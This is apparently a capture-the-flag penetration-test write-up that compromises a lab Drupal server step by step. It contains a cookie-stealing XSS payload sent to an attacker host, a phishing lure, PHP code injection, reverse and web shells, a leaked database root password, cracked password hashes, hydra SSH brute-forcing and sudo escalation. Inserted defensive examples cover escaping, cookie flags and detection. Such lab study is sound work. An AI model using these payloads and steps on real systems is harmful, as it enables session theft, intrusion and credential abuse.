Report http://172.16.11.181:
  • First step is to scan the application with Nmap / Nikto:
  1. nmap -sV 172.16.11.181
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.5
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
25/tcp open smtp Symantec Enterprise Security manager smtpd
80/tcp open http Apache httpd 2.2.3 ((CentOS))
110/tcp open pop3 Dovecot pop3d
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.3 ((CentOS))
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
993/tcp open ssl/imap Dovecot imapd
995/tcp open ssl/pop3 Dovecot pop3d
3306/tcp open mysql MySQL (unauthorized)
5801/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5901)
5802/tcp open vnc-http RealVNC 4.0 (resolution: 400x250; VNC TCP port: 5902)
5901/tcp open vnc VNC (protocol 3.8)
5902/tcp open vnc VNC (protocol 3.8)
5903/tcp open vnc VNC (protocol 3.8)
5904/tcp open vnc VNC (protocol 3.8)
6001/tcp open X11 (access denied)
6002/tcp open X11 (access denied)
6003/tcp open X11 (access denied)
6004/tcp open X11 (access denied)
Service Info: Host: localhost.localdomain; OS: Unix Cent OS
  2. nikto -h 172.16.11.181
+ Server: Apache/2.2.3 (CentOS)
+ Retrieved x-powered-by header: PHP/5.1.6
+ OSVDB-3268: /scripts/: Directory indexing found.
+ robots.txt contains 36 entries which should be manually viewed.
+ Apache/2.2.3 appears to be outdated (current is at least Apache/2.2.19). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ ETag header found on server, fields: 0x0f09ceda40c2bc564fc7b1c947d96711
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3931: /myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent: myphpnuke is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&id_cat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parent_id=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=Members_List&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-2946: /forum_members.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3233: /phpinfo.php: Contains PHP configuration information
+ OSVDB-4806: /support/messages: Axis WebCam allows retrieval of messages file (/var/log/messages). See http://www.websec.org/adv/axis2400.txt.html
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /marketing/: This might be interesting...
+ OSVDB-3268: /misc/: Directory indexing found.
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /sales/: This might be interesting...
+ OSVDB-3092: /support/: This might be interesting...
+ OSVDB-3092: /user/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3092: /scripts/showuser.cgi: Shows the output of the 'whoami' command, which shows the web server user.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /webmail/src/configtest.php: Squirrelmail configuration test may reveal version and system info.
+ OSVDB-3268: /sites/: Directory indexing found.
+ 6456 items checked: 1 error(s) and 41 item(s) reported on remote host
+ End Time: 2017-02-20 18:05:24 (537 seconds)

More Information:
/webmail/src/read_body.php
SquirrelMail version 1.4.8-21.el5.centos
By the SquirrelMail Project Team

XML-RPC server accepts POST requests only.
CentOS
Apache 2.2
  1. Checking the website (view source, create a new account, buttons etc.):
    * Insert a script into the search box and check the source (the script is filtered).
    * Find more information about the system via the source code.
    * The application is based on the Drupal CMS (theme is /themes/algaglas).
    * Retrieved x-powered-by header: PHP/5.1.6, so check phpinfo.
    * Create a new user, log in and look for new options:
    * All the users have an ID (the first is Admin).
    * All the pages have an ID (the hidden page has 28).
    * There are only 2 users who wrote articles on the website:
    (Barbara from Marketing and Steve from Executives).
  2. XSS
    * Add a comment.
    * Add a comment with an alert: <script>alert()</script>
    (Working!)
    * The website has users, which means we can get the cookie of someone with higher permissions than mine. I prefer Steve because he has the higher position.
    * Paste a comment with a script in one of his articles and wait:
    <script>new Image().src="http://172.16.3.3:1234/a.php?cookie="+encodeURI(document.cookie);</script>


* There is a contact option; we can send emails to other users, ask them to visit the page, test our social engineering skills :) and take their session.
* Send an email to Steve and wait:
hello steve my name is lior i dont understand what you wrote in line number 5 in this article please check and let me know
Thanks

* The session ID (cookie) of Steve is SESS86615d91cc2c2a92d23dfb632b363094=fi9ptbbvdc17iaprlchiajeqt7

We logged in as Steve :)
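As an added defender's example (not part of the original report), the two fixes that make the comment payload above inert: escape comment bodies on output, the way the search box already did, and issue the session cookie with HttpOnly so document.cookie cannot read it. The collector host and the cookie name/value below are constructed placeholders.

```python
import html
from http.cookies import SimpleCookie

# Constructed stand-in for the stored-XSS comment used above; the collector host is a placeholder.
PAYLOAD = ('<script>new Image().src="http://collector.invalid/a.php?cookie="'
           '+encodeURI(document.cookie);</script>')

def render_comment(body):
    """Escape a comment body on output so markup is displayed, never executed.
    This is what the search box already did and the comment field did not."""
    return "<p>" + html.escape(body, quote=True) + "</p>"

def session_cookie(name, value, secure=True):
    """Build a Set-Cookie header whose value document.cookie cannot read (HttpOnly),
    that only travels over TLS (Secure) and is not sent on cross-site navigation (SameSite)."""
    jar = SimpleCookie()
    jar[name] = value
    jar[name]["httponly"] = True   # the single attribute that defeats the payload above
    jar[name]["samesite"] = "Lax"
    jar[name]["path"] = "/"
    if secure:
        jar[name]["secure"] = True
    return jar.output(header="").strip()

def audit_set_cookie(header):
    """Return the protective attributes missing from a Set-Cookie header value."""
    attrs = {part.strip().split("=", 1)[0].lower() for part in header.split(";")[1:]}
    return [flag for flag in ("HttpOnly", "Secure", "SameSite") if flag.lower() not in attrs]

# Constructed: the shape of the Drupal session cookie captured above, carrying no flags at all.
CAPTURED = "SESS0123456789abcdef0123456789abcdef=constructedsessionvalue; path=/"

if __name__ == "__main__":
    print(render_comment(PAYLOAD))
    print("captured cookie lacks:", audit_set_cookie(CAPTURED))
    print(session_cookie("SESS0123456789abcdef0123456789abcdef", "constructedsessionvalue"))
```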

* Now I will add admin privileges to my user. No need for cookies anymore :)
* Check the website with higher permissions.
* On every page there is an option to change the input format; change it to PHP.


* Insert PHP code and check the page: (Working!)
<?php
phpinfo()
?>



* Insert a PHP reverse shell and a web application shell (wso).
* With the PHP reverse shell I don't have enough permissions, so keep going with wso.





* wso is working and the directory is writable, but there is no option to upload files, so we need to download the shell code directly to the machine.
cd to the directory with the file, serve it with SimpleHTTPServer and use wget to download it to a writable place. Run the file.



Check the /etc/passwd file:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
webalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin
jharraway:x:500:504::/home/jharraway:/bin/bash
spinkton:x:501:505::/home/spinkton:/bin/bash
sholden:x:502:506::/home/sholden:/bin/bash
bdio:x:503:507::/home/bdio:/bin/bash
jalderman:x:504:508::/home/jalderman:/bin/bash
gconnor:x:505:509::/home/gconnor:/bin/bash
sswiney:x:506:510::/home/sswiney:/bin/bash
dhart:x:507:511::/home/dhart:/bin/bash
gprune:x:508:512::/home/gprune:/bin/bash
hplink:x:509:513::/home/hplink:/bin/bash
jgrimes:x:510:514::/home/jgrimes:/bin/bash
shunter:x:511:515::/home/shunter:/bin/bash
jingersol:x:512:516::/home/jingersol:/bin/bash
mswanson:x:513:517::/home/mswanson:/bin/bash
jstone:x:514:518::/home/jstone:/bin/bash
jgoldman:x:515:519::/home/jgoldman:/bin/bash
tmaloney:x:516:520::/home/tmaloney:/bin/bash
xbruce:x:517:521::/home/xbruce:/bin/bash
sloreman:x:518:522:#flag#5b650c18929383074fea8870d857dd2e:/home/sloreman:/bin/bash

The Nikto scan found an install.php file:
+ OSVDB-3092: /install.php: install.php file found.
There is a note: To install to a different database, edit the appropriate settings.php file in the sites folder.


* Now we have more permissions.
Search in Google for the configuration file of Drupal and find it:
(settings.php)

* Check the settings.php file:



$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';
$db_prefix = '';
MySQL user: root
MySQL password: JumpUpAndDown
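An added example (not part of the original report) that audits what this settings.php reveals: the Drupal 5/6 $db_url is parsed and the findings a reviewer should raise are listed. The hardened connection string, the privileged-user list and the 16-character password threshold are assumed local policy.

```python
import re
from urllib.parse import urlsplit, unquote

# Drupal 5/6 keeps the database connection in settings.php as $db_url = 'driver://user:pass@host/db';
DB_URL_RE = re.compile(r"^\s*\$db_url\s*=\s*['\"](?P<url>[^'\"]+)['\"]\s*;", re.MULTILINE)
PRIVILEGED_DB_USERS = {"root", "admin", "mysql"}   # assumed policy: never used by an application

def parse_db_url(settings_text):
    """Return the parts of the first $db_url in a settings.php, or None if there is none."""
    m = DB_URL_RE.search(settings_text)
    if not m:
        return None
    u = urlsplit(m.group("url"))
    return {"driver": u.scheme, "user": unquote(u.username or ""),
            "password": unquote(u.password or ""), "host": u.hostname,
            "database": u.path.lstrip("/")}

def audit_settings(settings_text, file_mode=None):
    """List what an attacker who reads this file gains; file_mode is the permission bits
    of settings.php (e.g. 0o644) when known. Thresholds are an assumed local policy."""
    cfg = parse_db_url(settings_text)
    if cfg is None:
        return ["no $db_url found"]
    findings = []
    if cfg["user"] in PRIVILEGED_DB_USERS:
        findings.append("db user '%s' is a server-wide account; use a dedicated user granted "
                        "only on database '%s'" % (cfg["user"], cfg["database"]))
    if len(cfg["password"]) < 16 or cfg["password"].isalpha():
        findings.append("db password is short or letters-only; generate a long random one")
    if file_mode is not None and file_mode & 0o007:
        findings.append("settings.php is world-accessible (mode %o); expected 0440 root:apache"
                        % file_mode)
    return findings

# Constructed samples: the connection string recovered above, and a hardened replacement
# (its user and password are made up; %40 shows that URL-encoded characters are decoded).
FOUND = "<?php\n$db_url = 'mysqli://root:JumpUpAndDown@localhost/drupal';\n$db_prefix = '';\n"
HARDENED = "<?php\n$db_url = 'mysqli://drupal_app:Qm7%40x2v9pL4sT8wR3eZ@localhost/drupal';\n"

if __name__ == "__main__":
    for finding in audit_settings(FOUND, file_mode=0o644):
        print("-", finding)
```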

Connect to Sql and find information:



In the users table there are all the users and their password hashes for the application:
SELECT concat(name,':',pass) FROM `users` LIMIT 0,30
Two ways to find all the passwords: john tusers --format=Raw-MD5, and crackstation.


Dan:8f75ad3f04fc42f07c95e2f3d0ec3503:BaseballSeason
Jim:2a5de0f53b1317f7e36afcdb6b5202a4:letmein!
Barbara:bed128365216c019988915ed3add75fb:passw0rd
Xavier:3005d829eb819341357bfddf541c175b:thundercats
Jeff:ca594f739e257245f2be69eb546c1c04:sitepass
George:ed2b1f468c5f915f3f1cf75d7068baae:12341234
Tom:971dcf53e88e9268714d9d504753d347:drupalpassword
John:518462cd3292a67c755521c1fb50c909:4summer13
Sally:7a1c07ff60f9c07ffe8da34ecbf4edc2:fantasy
Steve:08d15a4aef553492d8971cdd5198f314:drupal
Johnathan:6dc523ebd2379d96cc0af32e2d224db0:1loveU
lior:e10adc3949ba59abbe56e057f20f883e:123456
Susan:0d42223010b69cab86634bc359ed870b:BobMarley
admin:49265c16d1dff8acef3499bd889299d6:football123
Stacey:85aca385eb555fb6a36a62915ddd8bc7:Seventy70
Sherry:c3319d1016a802db86653bcfab871f4f:1website
Juan:573152cc51de19df50e90b0e557db7fe:swanson
Michael:c7a4476fc64b75ead800da9ea2b7d072:cherry

Make a file with the /etc/passwd users and another file with the application's passwords and try them against SSH with hydra:
hydra -L tusers -P tpasswords ssh://172.16.11.181


Users were found:
Username: jharraway Password: letmein!
Username: bdio Password: passw0rd
Username: spinkton Password: football123
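Added detection example (not part of the original report): the hydra run above leaves a dense burst of sshd "Failed password" lines from one source in the auth log, followed by an "Accepted password" for a reused credential, and that pattern is what this detector alerts on. The log lines below are constructed, and the year is assumed because syslog does not record it.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# OpenSSH auth-log lines; syslog omits the year, so one is assumed (the constructed data is 2017).
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$")
def parse_line(line, year=2017):
    m = LOG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%b %d %H:%M:%S").replace(year=year)
    return ev

def detect_bruteforce(lines, max_failures=5, window=timedelta(seconds=60)):
    """Alert per source with max_failures failures inside `window`, naming accounts it then logged into."""
    by_src = defaultdict(list)
    for ev in filter(None, map(parse_line, lines)):
        by_src[ev["src"]].append(ev)
    alerts = []
    for src, events in by_src.items():
        events.sort(key=lambda e: e["ts"])
        fails = [e for e in events if e["result"] == "Failed"]
        # sliding window: does any run of max_failures consecutive failures fit in the window?
        burst = any(fails[i + max_failures - 1]["ts"] - fails[i]["ts"] <= window
                    for i in range(len(fails) - max_failures + 1))
        if not burst:
            continue
        accepted = [e["user"] for e in events
                    if e["result"] == "Accepted" and e["ts"] >= fails[0]["ts"]]
        alerts.append({"src": src, "failures": len(fails),
                       "users_tried": sorted({e["user"] for e in fails}),
                       "accepted": accepted})
    return alerts

# Constructed sample: a password-list run from one host ending in a valid login, plus one benign host.
SAMPLE_LOG = [
    "Feb 20 18:10:01 localhost sshd[2301]: Failed password for jharraway from 172.16.3.3 port 40110 ssh2",
    "Feb 20 18:10:02 localhost sshd[2303]: Failed password for bdio from 172.16.3.3 port 40112 ssh2",
    "Feb 20 18:10:03 localhost sshd[2305]: Failed password for invalid user lior from 172.16.3.3 port 40114 ssh2",
    "Feb 20 18:10:04 localhost sshd[2307]: Failed password for spinkton from 172.16.3.3 port 40116 ssh2",
    "Feb 20 18:10:05 localhost sshd[2309]: Failed password for sholden from 172.16.3.3 port 40118 ssh2",
    "Feb 20 18:10:06 localhost sshd[2311]: Accepted password for spinkton from 172.16.3.3 port 40120 ssh2",
    "Feb 20 18:15:40 localhost sshd[2401]: Failed password for gconnor from 172.16.11.50 port 51002 ssh2",
    "Feb 20 18:15:45 localhost sshd[2403]: Accepted password for gconnor from 172.16.11.50 port 51004 ssh2",
]
```

Run as `detect_bruteforce(SAMPLE_LOG)`: the 172.16.3.3 burst is reported with the account it ended up logging into, while the single typo from 172.16.11.50 stays quiet.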

Try to log in to all of them and try to make a file with sudo.

  1. Username: jharraway Password: letmein!
    Not working!
  2. Username: bdio Password: passw0rd
    Not working!
  3. Username: spinkton Password: football123
    Working!
Try sudo su:


I AM R-O-O-T!!

Flags:
1. #flag#550e1bafe077ff0b0b67f4e32f29d751 (View Source)
2. #flag#57dbe55b42b307fb4115146d239955d0 (http://172.16.11.181/node/28/)
3. #flag#550e1bafe077ff0b0b67f4e32f29d751 (phpinfo.php)
4. #flag#5b650c18929383074fea8870d857dd2e (/etc/passwd - sloreman)
5. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (ssh root, and all the other users)
6. #flag#fd38e201f27e98e13abcf62890c43303 (sql admin hash)
7. #flag#5e937c51b852e1ee90d42ddb5ccb8997 (bdio + jharraway ssh)
8. #flag#motd-flag (bdio + jharraway ssh)
9. #flag#0ab251c07822d26b07b88136739ae39b (spinkton user)
Fabio Lior Rahamim